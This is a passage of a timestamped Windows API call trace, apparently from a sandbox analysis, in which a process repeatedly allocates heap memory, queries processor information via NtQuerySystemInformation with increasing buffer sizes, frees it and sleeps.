RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.508] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.509] Sleep (dwMilliseconds=0x110) [0223.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.513] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.515] Sleep (dwMilliseconds=0x110) [0223.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.536] Sleep (dwMilliseconds=0x110) [0223.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.601] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.601] Sleep (dwMilliseconds=0x110) [0223.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.660] Sleep (dwMilliseconds=0x110) [0223.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.724] Sleep (dwMilliseconds=0x110) [0223.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.738] Sleep (dwMilliseconds=0x110) [0223.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.755] Sleep (dwMilliseconds=0x110) [0223.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.770] Sleep (dwMilliseconds=0x110) [0223.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.787] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.787] Sleep (dwMilliseconds=0x110) [0223.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.801] Sleep (dwMilliseconds=0x110) [0223.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.817] Sleep (dwMilliseconds=0x110) [0223.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.845] Sleep (dwMilliseconds=0x110) [0223.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0223.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0223.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.864] Sleep (dwMilliseconds=0x110) [0223.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0223.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0223.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0223.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0223.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0223.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0223.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 